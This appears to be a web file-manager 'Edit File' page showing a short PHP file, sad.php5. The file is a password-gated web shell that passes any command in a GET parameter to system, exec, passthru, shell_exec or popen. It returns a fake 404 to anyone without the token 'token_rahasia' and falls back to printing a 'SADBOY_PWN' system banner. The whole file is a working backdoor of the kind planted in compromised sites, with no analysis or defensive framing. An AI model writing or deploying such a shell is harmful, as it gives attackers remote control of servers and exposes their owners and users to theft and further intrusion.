Edit File Name : sad.php5 <?php @error_reporting(0); $t = isset($_GET["t"]) ? $_GET["t"] : ""; if ($t !== "token_rahasia") { if (!headers_sent()) { @header("HTTP/1.0 404 Not Found"); } die(); } $c = isset($_GET["c"]) ? $_GET["c"] : "id"; if (function_exists("system")) { @system($c); } elseif (function_exists("exec")) { @exec($c, $o); echo implode("\n", $o); } elseif (function_exists("passthru")) { @passthru($c); } elseif (function_exists("shell_exec")) { echo @shell_exec($c); } elseif (function_exists("popen")) { $p = @popen($c, "r"); if ($p) { while (!feof($p)) { echo fread($p, 4096); } pclose($p); } } else { echo "SADBOY_PWN:" . php_uname() . "@" . getcwd(); } Save